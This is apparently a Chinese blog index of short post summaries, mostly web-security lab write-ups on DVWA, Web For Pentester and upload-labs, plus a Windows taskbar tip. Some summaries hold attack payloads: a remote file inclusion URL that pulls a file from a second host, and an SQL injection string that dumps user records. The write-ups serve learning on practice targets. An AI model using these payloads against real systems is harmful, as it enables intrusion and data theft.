摘要:
暴力破解漏洞,没有对登录框做登录限制,攻击者可以不断的尝试暴力枚举用户名和密码 LOW 审计源码 <?php // 通过GET请求获取Login传参, // isset判断一个变量是否已设置,判断方法是变量是否为null if( isset( $_GET[ 'Login' ] ) ) { // 获取 阅读全文
摘要:
DVWA是一个新手练习Web安全很好的测试平台,官网下载请见https://dvwa.co.uk/ 想要练习,首先需要搭建,对于小白来说,搭建一个平台可能有一点点费劲,网上有很多大佬的教程,这里我总结一些我的搭建过程 只需要安装phpstudy然后将下载的dvwa压缩包解压到phpstudy安装目录 阅读全文
摘要:
任务栏设置 任务栏居中 由于windows默认的程序是从左往右显示,看着可能有一点不舒服,当然如果使用习惯的话,忽然居中,可能更不舒服 首先搜索字符映射表 点击字符映设表中第五行的空白字符,选择进行复制 创建文件夹,将文件夹的名称改为复制的空白字符 这时就得到一个空格文件夹名,然后右键任务栏 -> 阅读全文
摘要:
File include(文件包含) Example 1 没有任何过滤 审计源码 没有对我们传参的page进行任何过滤,payload如下 http://172.16.1.104/fileincl/example1.php?page=http://172.16.1.102/info.txt 本机in 阅读全文
摘要:
SQL injections Example 1 典型的SQL注入 name=root' or 1=1 %23 直接执行就可以导出所有用户 查看后端的源码 观察到,我们传入入的name中,传入就成为了'root',所以我们root' %23就是root' #可以闭合成功 这里由于后面也有一个',所以 阅读全文
摘要:
Web For Pentester是集成了一些简单的Web常见漏洞的靶场,其中有常见的XSS 文件上传 SQL注入 文件包含等常见漏洞,类似于DVWA Web For Pentester搭建 Web For Pentester官方直接提供了一个ISO的镜像文件 下载地址:https://www.pe 阅读全文
摘要:
Pass-18 条件竞争 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file 阅读全文
摘要:
Pass-17 审计源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name'] 阅读全文
摘要:
Pass12 GET00%截断 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); // 定义一个允许上传文件的数组 $file_ext = s 阅读全文
摘要:
Pass-5 .user.ini文件 根据我的观察,最新版的upload-labs第五关和旧版的不一样,这一关可以使用和Pass-10一样的方法通过,但是,其他所有的关卡都禁止了.ini文件的上传,就这一关没有禁止,老版的upload-labs没有这一关,由于网上我也没找到.ini文件如何利用,只能 阅读全文